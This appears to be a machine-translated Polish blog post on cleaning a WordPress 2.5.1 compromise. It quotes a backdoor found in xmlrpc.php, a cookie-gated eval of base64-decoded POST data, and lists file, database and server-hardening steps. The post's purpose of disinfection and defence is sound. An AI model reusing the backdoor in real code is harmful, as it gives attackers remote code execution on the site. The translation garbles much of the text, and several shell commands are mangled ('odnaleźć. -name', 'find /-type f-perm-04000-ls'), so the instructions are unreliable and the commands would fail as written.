WordPress Exploit — usuń pliki wirusów, zabezpieczenia SQL i serwer.

Zanim przeczytasz ten post, powinieneś zobaczyć post tutaj, Aby coś zrozumieć. :)

Znalazłem to w kilku plikach blogów na stealthsettings.com, kody podobne do poniższych, które pojawiły się w wyniku wirusa z rozszerzeniem wyczyn WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

Jeśli to powyższy plik xmlrpc.php z SennyAle w grep serwer, można zobaczyć, że istnieje całkiem sporo tego typu w kodzie źródłowym.

Czyszczenie zainfekowane pliki:

Ooookkkk ...
1. Najlepszym rozwiązaniem, po tym, jak backupI oczyszczone bazy danych jest wycierać akta WordPress (możesz zachować wp-config.php i pliki, które nie są ściśle związane z platformą wp, po ich dokładnym sprawdzeniu) z serwera i załadować oryginalne z wersji 2.5.1 (Podczas tego dokonać aktualizacji WP wersja :)) http://wordpress.org/download/ . Przetrzyj tym pliki motywu, jeśli nie ufa się ich uważnego sprawdzenia.

Wydaje się, że zostały naruszone oraz pliki tematów, które nie zostały wykorzystane, zanim na blogu i po prostu zmienić temat, nie rozwiąże problemu.

./andreea/wp-content/themes/default/index.php:

2. Wyszukać i usunąć wszystkie pliki zawierające: * _new.php, * _old.php, * Jpgg, * Giff, * Pngg i pliku wp-info.txt, jeśli istnieje....

odnaleźć. -name „* _new.php”
odnaleźć. -name „* _old.php”
odnaleźć. -name „* .jpgg”
odnaleźć. -name „* _giff”
odnaleźć. -name „* _pngg”
odnaleźć. -name „wp-info.txt”

3. w / Tmp , Wyszukiwanie i usuwanie folderów, takich jak tmpYwbzT2

Czyszczenie SQL :

1. w tabeli Table wp_options sprawdzić, czy nie jest usunąć linie: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Wszystko w wp_options, iść do active_plugins i usunąć, jeśli istnieje plugin, który kończy się w jednym z rozszerzeń * _new.php, * _old.php, *. jpgg, *. giff, *. pngg lub inny numer wewnętrzny jest podejrzana, sprawdź dokładnie.

3. W tabeli wp_users, Czy jest użytkownik, który nie napisał nic w jego prawej, kolumna user_nicename. Usuń tego użytkownika, ale zapamiętaj numer w kolumnie ID. Ten użytkownik prawdopodobnie użyje „WordPress„Ca user_login i wydaje się być stworzony na 00: 00: 00 0000-00-00.

4. Przejdź do tabeli wp_usermeta i usunąć wszystkie linie należące ID powyżej.

Po wykonaniu tego czyszczenia sql wyłącz, a następnie aktywuj dowolną wtyczkę. (w blogu -> Dashboard -> Plugins)

Bezpieczny serwer:

1. Zobacz, jakie katalogi i pliki są "zapisywalny"(chmod 777) i spróbuj umieścić a chmod które nie pozwolą już na ich pisanie na żadnym poziomie. (chmod 644, na przykład)

Znajdź. -Perm-2-ls

2. Zobacz, jakie pliki mają ustawiony bit suid lub sgid . Jeśli nie używasz te pliki umieścić na nich chmod 0 lub odinstalować pakiet, który zawiera. Są bardzo niebezpieczne, ponieważ wykonanie uprawnień "grupa"Lub"korzeń"A nie z normalnych uprawnień użytkowników do wykonywania tego pliku.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Sprawdź, które porty są otwarte i próby zamknięcia lub zabezpieczenia tych, które nie są używane.

netstat-an | grep-i słuchać

O nim. Widzę Niektóre blogi są zakazane de Google Search a inni mówią: „Dobrze im zrobił!!!” . Cóż, zrobiłbym to dla nich… ale co powiesz, jeśli Google zacznie banować wszystkie strony formowanie  JEST SPAM i umieścić trojanów (Trojan.Clicker.HTML) w plikach cookie?